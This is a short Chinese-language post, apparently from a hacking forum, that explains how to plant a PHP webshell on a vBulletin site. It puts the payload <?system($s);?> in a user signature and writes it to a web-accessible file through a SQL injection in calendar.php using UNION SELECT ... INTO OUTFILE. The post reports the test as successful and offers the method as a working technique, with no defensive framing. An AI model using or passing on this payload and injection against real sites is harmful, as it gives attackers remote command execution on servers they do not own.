type="14230"> 思路：
把代码写入数据库，在通过注射导出webshell

演示：
还是用vbb的那个calendar.php的注射漏洞

首先编辑自己的资料，在“个性签名”里写代码 <?system($s);?>，

再action=edit&eventid=-1%20UNION%20SELECT%201,1,1,1,1,signature%20from%20user%20into%20outfile%20'A:5sound\EasyPHP\www\kaka.php'

打开kaka1.php
1    1    1    2000-00-01    <?system($s);?>    1

呵呵 php在运行中只认识<??> 所以上面的wenshell是可以运行的

测试成功。

呵呵 ！！ 现在没什么时间 简单把思路写出来了 改天写文章 hoho